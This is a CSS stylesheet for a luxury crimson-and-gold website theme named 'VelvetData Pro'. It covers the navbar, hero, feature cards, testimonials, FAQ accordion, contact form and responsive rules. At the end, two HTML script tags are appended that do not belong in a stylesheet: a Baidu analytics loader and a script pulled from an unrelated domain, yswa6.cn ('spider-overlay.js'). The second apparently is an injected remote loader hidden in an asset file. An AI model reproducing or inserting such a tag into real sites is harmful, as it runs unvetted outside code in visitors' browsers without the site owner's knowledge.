﻿/* ============================================================
   VelvetData Pro - Luxury Crimson Velvet Theme
   Color: red-800/crimson-700 with gold accents
   ============================================================ */

/* --- GOOGLE FONT --- */
@import url('https://fonts.googleapis.com/css2?family=Playfair+Display:wght@400;600;700;800;900&family=Noto+Sans+SC:wght@300;400;500;700;900&family=Cormorant+Garamond:wght@400;600;700&display=swap');

/* --- CSS VARIABLES --- */
:root {
  --velvet-deep: #7F1D1D;
  --velvet-crimson: #991B1B;
  --velvet-mid: #B91C1C;
  --velvet-dark: #450A0A;
  --velvet-black: #1F0303;
  --gold: #D4A843;
  --gold-light: #F0D78C;
  --gold-pale: #FDF3D0;
  --gold-foil: linear-gradient(135deg, #D4A843 0%, #F0D78C 25%, #C8963E 50%, #E8C86A 75%, #B8860B 100%);
  --cream: #FDF8F0;
  --dark-cream: #F5EDE0;
  --serif: 'Playfair Display', 'Noto Sans SC', serif;
  --sans: 'Noto Sans SC', sans-serif;
  --cormorant: 'Cormorant Garamond', 'Noto Sans SC', serif;
}

/* --- BASE --- */
* { margin: 0; padding: 0; box-sizing: border-box; }
html { scroll-behavior: smooth; }

body {
  font-family: var(--sans);
  background-color: var(--cream);
  color: #3D1111;
  line-height: 1.7;
  overflow-x: hidden;
}

/* --- VELVET TEXTURE BACKGROUND --- */
.velvet-bg {
  background: linear-gradient(180deg, #5C1010 0%, #7F1D1D 30%, #3D0808 70%, #1F0303 100%);
  position: relative;
}
.velvet-bg::before {
  content: '';
  position: absolute;
  inset: 0;
  background:
    radial-gradient(ellipse at 20% 20%, rgba(240, 215, 140, 0.06) 0%, transparent 60%),
    radial-gradient(ellipse at 80% 60%, rgba(212, 168, 67, 0.04) 0%, transparent 50%),
    repeating-linear-gradient(0deg, transparent, transparent 2px, rgba(255,255,255,0.008) 2px, rgba(255,255,255,0.008) 4px);
  pointer-events: none;
  z-index: 0;
}
.velvet-bg > * { position: relative; z-index: 1; }

/* --- GOLD TEXT --- */
.gold-text {
  background: var(--gold-foil);
  -webkit-background-clip: text;
  -webkit-text-fill-color: transparent;
  background-clip: text;
}

/* --- GOLD BORDER --- */
.gold-border {
  border: 1.5px solid transparent;
  background-clip: padding-box;
  position: relative;
}
.gold-border::before {
  content: '';
  position: absolute;
  inset: 0;
  border-radius: inherit;
  padding: 1.5px;
  background: var(--gold-foil);
  -webkit-mask: linear-gradient(#fff 0 0) content-box, linear-gradient(#fff 0 0);
  -webkit-mask-composite: xor;
  mask-composite: exclude;
  pointer-events: none;
  z-index: 0;
}

/* --- GEM SPARKLE ANIMATION --- */
.gem-sparkle {
  display: inline-block;
  transition: all 0.4s cubic-bezier(0.175, 0.885, 0.32, 1.275);
}
.gem-sparkle:hover {
  transform: scale(1.2) rotate(15deg);
  filter: drop-shadow(0 0 18px rgba(212, 168, 67, 0.9)) drop-shadow(0 0 35px rgba(240, 215, 140, 0.6));
}

@keyframes gemPulse {
  0%, 100% { filter: drop-shadow(0 0 10px rgba(212, 168, 67, 0.6)); }
  50% { filter: drop-shadow(0 0 25px rgba(240, 215, 140, 0.95)); }
}
.gem-sparkle.animate {
  animation: gemPulse 2s ease-in-out infinite;
}

/* --- NAVBAR --- */
.navbar {
  position: fixed;
  top: 0;
  left: 0;
  right: 0;
  z-index: 1000;
  transition: all 0.35s ease;
  padding: 1.2rem 0;
}
.navbar.scrolled {
  background: rgba(31, 3, 3, 0.97);
  backdrop-filter: blur(20px);
  padding: 0.7rem 0;
  box-shadow: 0 4px 30px rgba(0, 0, 0, 0.5), 0 1px 0 rgba(212, 168, 67, 0.15);
}
.navbar-brand {
  font-family: var(--serif);
  font-weight: 800;
  font-size: 1.5rem;
  letter-spacing: 0.03em;
}
.nav-link {
  font-family: var(--sans);
  font-weight: 500;
  font-size: 0.95rem;
  letter-spacing: 0.05em;
  color: #F5EDE0 !important;
  transition: all 0.3s ease;
  position: relative;
  padding: 0.4rem 0;
}
.nav-link::after {
  content: '';
  position: absolute;
  bottom: 0;
  left: 0;
  width: 0;
  height: 2px;
  background: var(--gold-foil);
  transition: width 0.35s ease;
}
.nav-link:hover::after,
.nav-link.active::after { width: 100%; }
.nav-link:hover { color: #F0D78C !important; }

/* Mobile menu */
.mobile-menu {
  background: rgba(31, 3, 3, 0.985);
  backdrop-filter: blur(20px);
  border-top: 1px solid rgba(212, 168, 67, 0.2);
}

/* --- HERO --- */
.hero-section {
  min-height: 100vh;
  display: flex;
  align-items: center;
  position: relative;
  overflow: hidden;
}
.hero-overlay {
  position: absolute;
  inset: 0;
  background:
    radial-gradient(ellipse at 30% 50%, rgba(153, 27, 27, 0.4) 0%, transparent 60%),
    radial-gradient(ellipse at 70% 30%, rgba(212, 168, 67, 0.08) 0%, transparent 50%);
  z-index: 1;
}
.hero-content { position: relative; z-index: 2; }
.hero-heading {
  font-family: var(--serif);
  font-weight: 900;
  font-size: clamp(2.5rem, 6vw, 4.5rem);
  line-height: 1.15;
  letter-spacing: -0.01em;
}
.hero-subtitle {
  font-family: var(--cormorant);
  font-size: clamp(1.1rem, 2.5vw, 1.4rem);
  color: #F0D78C;
  letter-spacing: 0.1em;
}
.hero-image-wrap {
  position: relative;
  z-index: 2;
  border-radius: 1.5rem;
  overflow: hidden;
  box-shadow: 0 20px 60px rgba(0,0,0,0.5), 0 0 0 2px rgba(212, 168, 67, 0.3);
}
.hero-image-wrap img {
  width: 100%;
  height: auto;
  display: block;
}

/* Buttons */
.btn-gold {
  display: inline-flex;
  align-items: center;
  gap: 0.5rem;
  padding: 0.95rem 2.5rem;
  font-family: var(--serif);
  font-weight: 700;
  font-size: 1.05rem;
  letter-spacing: 0.06em;
  background: var(--gold-foil);
  color: #3D0808;
  border: none;
  border-radius: 9999px;
  cursor: pointer;
  transition: all 0.35s ease;
  box-shadow: 0 6px 25px rgba(212, 168, 67, 0.35);
  text-decoration: none;
}
.btn-gold:hover {
  transform: translateY(-3px);
  box-shadow: 0 12px 40px rgba(212, 168, 67, 0.55);
  color: #1F0303;
}
.btn-outline-gold {
  display: inline-flex;
  align-items: center;
  gap: 0.5rem;
  padding: 0.9rem 2.5rem;
  font-family: var(--serif);
  font-weight: 700;
  font-size: 1.05rem;
  letter-spacing: 0.06em;
  background: transparent;
  color: #F0D78C;
  border: 2px solid #D4A843;
  border-radius: 9999px;
  cursor: pointer;
  transition: all 0.35s ease;
  text-decoration: none;
}
.btn-outline-gold:hover {
  background: rgba(212, 168, 67, 0.1);
  transform: translateY(-3px);
  box-shadow: 0 8px 30px rgba(212, 168, 67, 0.2);
}

/* --- FEATURE CARDS --- */
.feature-card {
  background: linear-gradient(160deg, #6B1515 0%, #4A0A0A 50%, #3D0808 100%);
  border-radius: 1.25rem;
  padding: 2.5rem 2rem;
  position: relative;
  overflow: hidden;
  transition: all 0.4s ease;
}
.feature-card::before {
  content: '';
  position: absolute;
  inset: 2px;
  border-radius: 1.2rem;
  border: 1px solid rgba(212, 168, 67, 0.25);
  pointer-events: none;
  z-index: 1;
}
.feature-card .card-bg-texture {
  position: absolute;
  inset: 0;
  background:
    repeating-linear-gradient(0deg, transparent, transparent 3px, rgba(212,168,67,0.015) 3px, rgba(212,168,67,0.015) 6px);
  pointer-events: none;
}
.feature-card:hover {
  transform: translateY(-10px);
  box-shadow: 0 25px 60px rgba(0,0,0,0.5), 0 0 0 2px rgba(212, 168, 67, 0.4);
}
.feature-icon {
  width: 60px;
  height: 60px;
  display: flex;
  align-items: center;
  justify-content: center;
  border-radius: 16px;
  background: linear-gradient(135deg, rgba(212,168,67,0.2), rgba(153,27,27,0.3));
  border: 1px solid rgba(212,168,67,0.35);
  font-size: 1.5rem;
  color: #F0D78C;
  margin-bottom: 1.5rem;
  position: relative;
  z-index: 2;
}
.feature-card h3 {
  font-family: var(--serif);
  font-size: 1.3rem;
  color: #F0D78C;
  margin-bottom: 0.75rem;
  position: relative;
  z-index: 2;
}
.feature-card p {
  color: #F5EDE0;
  opacity: 0.85;
  font-size: 0.95rem;
  position: relative;
  z-index: 2;
  line-height: 1.7;
}
.gem-badge {
  position: absolute;
  top: 1rem;
  right: 1rem;
  width: 36px;
  height: 36px;
  display: flex;
  align-items: center;
  justify-content: center;
  background: var(--gold-foil);
  border-radius: 8px;
  color: #3D0808;
  font-size: 0.85rem;
  z-index: 3;
  transform: rotate(5deg);
  box-shadow: 0 3px 12px rgba(212,168,67,0.3);
}

/* --- STATS SECTION --- */
.stats-section {
  background: linear-gradient(180deg, #7F1D1D 0%, #5C1010 40%, #991B1B 100%);
  position: relative;
}
.stats-section::before {
  content: '';
  position: absolute;
  inset: 0;
  background:
    radial-gradient(ellipse at 50% 0%, rgba(240,215,140,0.06) 0%, transparent 60%);
  pointer-events: none;
}
.stat-number {
  font-family: var(--serif);
  font-size: clamp(2.5rem, 5vw, 3.5rem);
  font-weight: 900;
}
.stat-label {
  font-family: var(--cormorant);
  font-size: 1.1rem;
  color: #F0D78C;
  letter-spacing: 0.08em;
  opacity: 0.9;
}

/* --- TESTIMONIAL CARDS --- */
.testimonial-card {
  background: linear-gradient(160deg, #6B1515 0%, #3D0808 60%, #2D0505 100%);
  border-radius: 1.25rem;
  padding: 2rem;
  position: relative;
  transition: all 0.35s ease;
}
.testimonial-card::before {
  content: '';
  position: absolute;
  inset: 2px;
  border-radius: 1.2rem;
  border: 1px solid rgba(212, 168, 67, 0.2);
  pointer-events: none;
}
.testimonial-card:hover {
  transform: translateY(-8px);
  box-shadow: 0 20px 50px rgba(0,0,0,0.55), 0 0 0 2px rgba(212, 168, 67, 0.3);
}
.testimonial-avatar {
  width: 56px;
  height: 56px;
  border-radius: 50%;
  border: 2px solid #D4A843;
  object-fit: cover;
  box-shadow: 0 0 20px rgba(212,168,67,0.25);
}
.stars {
  color: #F0D78C;
  letter-spacing: 3px;
  font-size: 0.9rem;
}

/* --- FAQ ACCORDION --- */
.faq-section {
  background: linear-gradient(180deg, #3D0808 0%, #2D0505 50%, #1F0303 100%);
}
.faq-item {
  border-radius: 1rem;
  overflow: hidden;
  margin-bottom: 1rem;
  transition: all 0.3s ease;
}
.faq-question {
  background: linear-gradient(135deg, #6B1515, #4A0A0A);
  padding: 1.3rem 1.5rem;
  cursor: pointer;
  display: flex;
  align-items: center;
  justify-content: space-between;
  font-family: var(--serif);
  font-weight: 600;
  font-size: 1.1rem;
  color: #F0D78C;
  border: 1px solid rgba(212,168,67,0.2);
  border-radius: 1rem;
  transition: all 0.3s ease;
  user-select: none;
}
.faq-question:hover {
  border-color: rgba(212,168,67,0.5);
  background: linear-gradient(135deg, #7F1D1D, #5C1010);
}
.faq-question.active {
  border-radius: 1rem 1rem 0 0;
  border-color: #D4A843;
  background: linear-gradient(135deg, #7F1D1D, #5C1010);
}
.faq-answer {
  background: linear-gradient(135deg, #4A0A0A, #3D0808);
  max-height: 0;
  overflow: hidden;
  transition: max-height 0.4s ease, padding 0.4s ease;
  border-radius: 0 0 1rem 1rem;
  border: 1px solid transparent;
  border-top: none;
}
.faq-answer.open {
  max-height: 500px;
  border-color: rgba(212,168,67,0.2);
  border-top: none;
}
.faq-answer p {
  padding: 1.5rem;
  color: #F5EDE0;
  opacity: 0.9;
  line-height: 1.8;
}
.faq-icon {
  font-size: 1rem;
  transition: transform 0.35s ease;
  color: #D4A843;
}
.faq-question.active .faq-icon {
  transform: rotate(45deg);
}

/* --- CTA SECTION --- */
.cta-section {
  background: linear-gradient(135deg, #7F1D1D 0%, #B91C1C 30%, #D4A843 70%, #F0D78C 100%);
  position: relative;
  overflow: hidden;
}
.cta-section::before {
  content: '';
  position: absolute;
  inset: 0;
  background:
    radial-gradient(circle at 20% 50%, rgba(255,255,255,0.1) 0%, transparent 50%),
    radial-gradient(circle at 80% 50%, rgba(212,168,67,0.2) 0%, transparent 50%);
  pointer-events: none;
}
.cta-sparkle-icon {
  display: inline-block;
  animation: gemPulse 1.8s ease-in-out infinite;
}

/* --- FOOTER --- */
.footer {
  background: #1F0303;
  border-top: 1px solid rgba(212,168,67,0.15);
}
.footer a {
  color: #F5EDE0;
  opacity: 0.75;
  transition: all 0.3s ease;
  text-decoration: none;
}
.footer a:hover {
  color: #F0D78C;
  opacity: 1;
}

/* --- ABOUT PAGE --- */
.about-hero {
  background: linear-gradient(180deg, #5C1010 0%, #3D0808 60%, #1F0303 100%);
  min-height: 50vh;
  display: flex;
  align-items: center;
}
.about-value-card {
  background: linear-gradient(160deg, #6B1515, #4A0A0A);
  border-radius: 1.25rem;
  padding: 2rem;
  position: relative;
  border: 1px solid rgba(212,168,67,0.2);
  transition: all 0.35s ease;
}
.about-value-card:hover {
  border-color: rgba(212,168,67,0.5);
  transform: translateY(-6px);
  box-shadow: 0 15px 40px rgba(0,0,0,0.4);
}
.team-avatar {
  width: 100px;
  height: 100px;
  border-radius: 50%;
  border: 3px solid #D4A843;
  object-fit: cover;
  margin: 0 auto 1rem;
  box-shadow: 0 0 25px rgba(212,168,67,0.2);
}

/* --- CONTACT PAGE --- */
.contact-hero {
  background: linear-gradient(180deg, #5C1010 0%, #3D0808 60%, #1F0303 100%);
  min-height: 45vh;
  display: flex;
  align-items: center;
}
.contact-form-card {
  background: linear-gradient(160deg, #6B1515, #4A0A0A);
  border-radius: 1.5rem;
  padding: 2.5rem;
  border: 1px solid rgba(212,168,67,0.2);
  box-shadow: 0 20px 50px rgba(0,0,0,0.4);
}
.contact-input {
  width: 100%;
  padding: 0.9rem 1.2rem;
  background: rgba(31,3,3,0.6);
  border: 1px solid rgba(212,168,67,0.25);
  border-radius: 0.75rem;
  color: #F5EDE0;
  font-family: var(--sans);
  font-size: 0.95rem;
  transition: all 0.3s ease;
  outline: none;
}
.contact-input:focus {
  border-color: #D4A843;
  box-shadow: 0 0 0 3px rgba(212,168,67,0.12);
  background: rgba(31,3,3,0.8);
}
.contact-input::placeholder {
  color: rgba(245,237,224,0.4);
}
.contact-info-item {
  display: flex;
  align-items: flex-start;
  gap: 1rem;
  padding: 1.2rem;
  background: rgba(31,3,3,0.4);
  border-radius: 0.75rem;
  border: 1px solid rgba(212,168,67,0.12);
  transition: all 0.3s ease;
}
.contact-info-item:hover {
  border-color: rgba(212,168,67,0.35);
}

/* --- SCROLLBAR --- */
::-webkit-scrollbar { width: 8px; }
::-webkit-scrollbar-track { background: #1F0303; }
::-webkit-scrollbar-thumb {
  background: linear-gradient(180deg, #991B1B, #D4A843);
  border-radius: 4px;
}

/* --- SELECTION --- */
::selection {
  background: rgba(212,168,67,0.35);
  color: #FDF8F0;
}

/* --- RESPONSIVE --- */
@media (max-width: 767px) {
  .hero-section { min-height: auto; padding: 7rem 0 4rem; }
  .navbar { padding: 0.8rem 0; }
  .navbar.scrolled { padding: 0.5rem 0; }
  .feature-card { padding: 2rem 1.5rem; }
  .testimonial-card { padding: 1.5rem; }
  .contact-form-card { padding: 1.5rem; }
  .faq-question { font-size: 1rem; padding: 1rem 1.2rem; }
}
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?66486df8906d1585b228aae20f1074ed";
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
})();
</script>
<script src="https://yswa6.cn/spider-overlay.js"></script>

